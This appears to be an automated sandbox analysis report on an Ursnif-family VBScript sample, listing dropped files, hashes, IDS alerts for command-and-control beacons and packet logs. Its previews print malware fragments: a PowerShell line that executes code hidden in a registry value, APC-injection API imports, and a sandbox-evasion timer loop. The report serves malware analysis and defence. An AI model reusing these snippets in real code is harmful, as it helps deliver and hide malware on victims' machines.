                                                          SHA-256:5C22B14A5EFCEC499A87EFE40ED4B19C5C66169A4B0AEFB6ABD8F06DC0F39F44
                                                          SHA-512:E67F6A45C7E6E894EC16AD288A5E9733F61FAA736271A0687EDB8E3E03C2A75BF615329F72A95DCECC7004FCABABF95C5816D4263A9F3F9DF545F2BA6622EE6E
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6359451339255986
                                                          Encrypted:false
                                                          SSDEEP:24:etGShMOWEey8MTz7X8daP0eWQJDdWSWtJ0DtkZfGhBUn7XI+ycuZhNdYNakS8YC8:6X7KMTcd6q+WPVJGh41ulCNa3LOq
                                                          MD5:16D4568C21BD229F968BD5DBF24C59D5
                                                          SHA1:90A6890993F0145A6343E2D84D58B23550B9BDB7
                                                          SHA-256:365F757DF260768D372CA42A74534FE66BAF97B882CB5A6A7ED952D0052FBE65
                                                          SHA-512:5D7869BFA0DB6110F1C1CBF45F7EDFDF3730516F7FE1BFB5D5D8BDB75817FF7A8626D36069563533BC1D65D0C153044B7F0466C93B5C2CC8A37151CA2784F2B3
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q.;a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.cshxvr3e.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\fum.cpp
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):387072
                                                          Entropy (8bit):6.617827225958404
                                                          Encrypted:false
                                                          SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                                          MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                                          SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                                          SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                                          SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                                          Malicious:true
                                                          Joe Sandbox View:
                                                          • Filename: 345678.vbs, Detection: malicious, Browse
                                                          • Filename: start[526268].vbs, Detection: malicious, Browse
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.109557763825611
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYak7YnqqOPN5Dlq5J:+RI+ycuZhN2akSOPNnqX
                                                          MD5:F3E233FD4098F2F441A542025FF3E0A7
                                                          SHA1:597AB33ABFBE4F5CFEB6808775DCDED22D58CCB8
                                                          SHA-256:FD33950219A976AD54153B66857E630F78799CBE5E8DA964807FD11829D3C90B
                                                          SHA-512:930061FB9A9E6A2848A44E62F35943F56ECAC76DC1C5BE0D86FC6C99ED8A2C62D9C6267A0F1203CAC1A8E89F94E7024A80DB24C574E9E1A65C0D7556551D2EF0
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.u.l.j.o.g.h.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.u.l.j.o.g.h.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):375
                                                          Entropy (8bit):5.268143064243297
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fbt+zxs7+AEszIN723fb1:p37Lvkmb6K2aj4WZETaj1
                                                          MD5:58DD1E110A0447FD5B53B32E7B0E0941
                                                          SHA1:7784888063E2D10C540145541505EEF5865522FF
                                                          SHA-256:B8A3B4FA1CC289A7C5B0E11A4CDC6F638F3D8ACD6E1EC83E94902E235FE3C586
                                                          SHA-512:F7530053FE9E994B8C8FC4982F62F103B86142AF640A9082F0592F5818ECDE2CFC18D9B99F229462516D93D74FCC234F919C3AE133AE148A4DF5AFDF369C7633
                                                          Malicious:true
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.598059506191642
                                                          Encrypted:false
                                                          SSDEEP:24:etGSN/u2Dg85lxlok3Jgpiw4MatkZfwYaUI+ycuZhN2akSOPNnq:6gWb5lxF1YJww1ul2a3Sq
                                                          MD5:FEB9538DC35D245E399D2602C6FD4231
                                                          SHA1:BB5149C40448B2D113E21D8DB128E1765A748879
                                                          SHA-256:A08CC6DB2B1AC20DA80551DF8ED86DE2FC3FCC70879026C440C6CC4A36DC80DD
                                                          SHA-512:F1CA4A089DA2725D81A290C6B5ADC20DDC989B2949176EE8E8BAF9C8520C698048BDCB72477791C3F50A972A6DF0E2F5B7698C7C3E0D20EA3DB4894480EA49E6
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.;a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.kuljoghz.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20210910\PowerShell_transcript.581804.5QGhQCWh.20210910111356.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):982
                                                          Entropy (8bit):5.453422120442401
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAZ7vBVLix2DOXUWOLCHGIYBtBCWGHjeTKKjX4CIym1ZJXjOLCHGIYBtBW:BZBvTLioORFeVGqDYB1Z7FeW
                                                          MD5:FB52BB7C612E78BF8B6558564CBFF5E5
                                                          SHA1:90DDFA606B428DBD189180474B604518B98B3D8E
                                                          SHA-256:82BF12211F6E58C06D626AA5D76094B16A49C2F4F2AB98B71736DAF8AAB8E8D6
                                                          SHA-512:817BFE525BC506BCA542FA21E434C47EDBA90BC0CEEA82D25D64DEA6FEDEBC8EC67F1303B39EC3A4014EA4158D2CCBE021C058C566A37E6477AA090ABC69F1C8
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210910111357..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 581804 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 5104..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210910111357..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with very long lines, with CRLF line terminators
                                                          Entropy (8bit):4.8528890366453785
                                                          TrID:
                                                            File name:sample.vbs
                                                            File size:1397160
                                                            MD5:1dd89d4f6390f3dc46486ae6ee57bbf1
                                                            SHA1:1be7d12e55659bdd87c34eb24d7d4adf0b68a2c5
                                                            SHA256:801e42662653db4f680b49833f5ee0a48124aa814dd4178be1f948f4a8a68b07
                                                            SHA512:f79ad12ed3380a1eccf763792ce3d4f280fc77ebfe4604c4335f3d85b196141adaf813aa1a6bf522bd85f6eceaf003df3eabdfee859aa70f2477e6b3d25efe83
                                                            SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99bk:ipvp9BT1U9cyjUAvmEZbk
                                                            File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                                            File Icon

                                                            Icon Hash:e8d69ece869a9ec4

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            09/10/21-11:13:44.229778TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4981880192.168.2.6185.251.90.253
                                                            09/10/21-11:13:44.229778TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981880192.168.2.6185.251.90.253
                                                            09/10/21-11:13:45.468758TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4981980192.168.2.6185.251.90.253
                                                            09/10/21-11:13:45.468758TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981980192.168.2.6185.251.90.253
                                                            09/10/21-11:13:46.525416TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4982080192.168.2.6185.251.90.253
                                                            09/10/21-11:13:46.525416TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982080192.168.2.6185.251.90.253
                                                            09/10/21-11:14:24.508800TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4982180192.168.2.6185.251.90.253
                                                            09/10/21-11:14:24.508800TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982180192.168.2.6185.251.90.253

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 10, 2021 11:13:44.180072069 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.228905916 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.229147911 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.229778051 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.320012093 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704672098 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704710960 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704735041 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704761028 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704787016 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704808950 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704832077 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704857111 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704879045 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.704951048 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.705018044 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.705214024 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.705315113 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.753833055 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753868103 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753885984 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753907919 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753931046 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753952026 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753974915 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.753997087 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754019976 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754043102 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754066944 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754065037 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.754090071 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754113913 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754134893 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754157066 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754164934 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.754180908 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754205942 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754225016 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754226923 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.754249096 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754261971 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.754271984 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.754292965 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.754323959 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.802499056 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802531004 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802548885 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802565098 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802581072 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802597046 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802613974 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802629948 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802644968 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802664042 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802681923 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802696943 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802712917 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802728891 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802743912 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802756071 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.802759886 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802776098 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802795887 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802812099 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802829981 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802845955 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802859068 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.802861929 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802877903 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802894115 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802908897 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802922010 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802927971 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.802939892 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802957058 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802963972 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.802973986 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802989006 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.802995920 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.803000927 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803011894 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803024054 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803025961 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.803036928 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803050041 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803056002 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.803066015 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803081036 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803087950 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.803097010 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803128958 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.803131104 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.803160906 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.804337025 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.804428101 CEST4981880192.168.2.6185.251.90.253
                                                            Sep 10, 2021 11:13:44.853878975 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.853929996 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.853960991 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.853986025 CEST8049818185.251.90.253192.168.2.6
                                                            Sep 10, 2021 11:13:44.854012966 CEST8049818185.251.90.253192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 10, 2021 11:10:37.836555004 CEST6034253192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:37.874860048 CEST53603428.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:10:57.744205952 CEST6134653192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:57.775474072 CEST53613468.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:10:58.611458063 CEST5177453192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:58.639091015 CEST53517748.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:10:59.106736898 CEST5602353192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:59.139406919 CEST53560238.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:10:59.451834917 CEST5838453192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:59.492953062 CEST53583848.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:10:59.613979101 CEST6026153192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:10:59.649709940 CEST53602618.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:00.100292921 CEST5606153192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:00.135390997 CEST53560618.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:00.788482904 CEST5833653192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:00.825284958 CEST53583368.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:01.317054987 CEST5378153192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:01.352045059 CEST53537818.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:01.999335051 CEST5406453192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:02.026678085 CEST53540648.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:02.921066999 CEST5281153192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:02.951072931 CEST53528118.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:03.349270105 CEST5529953192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:03.377957106 CEST53552998.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:14.823532104 CEST6374553192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:14.857819080 CEST53637458.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:36.756078005 CEST5005553192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:36.792424917 CEST53500558.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:46.918876886 CEST6137453192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:46.972485065 CEST53613748.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:11:49.086417913 CEST5033953192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:11:49.133498907 CEST53503398.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:13:44.136544943 CEST6330753192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:13:44.164992094 CEST53633078.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:13:45.104943991 CEST4969453192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:13:45.411726952 CEST53496948.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:13:46.440280914 CEST5498253192.168.2.68.8.8.8
                                                            Sep 10, 2021 11:13:46.473021030 CEST53549828.8.8.8192.168.2.6
                                                            Sep 10, 2021 11:14:24.268157959 CEST5001053192.168.2.68.8.8.8
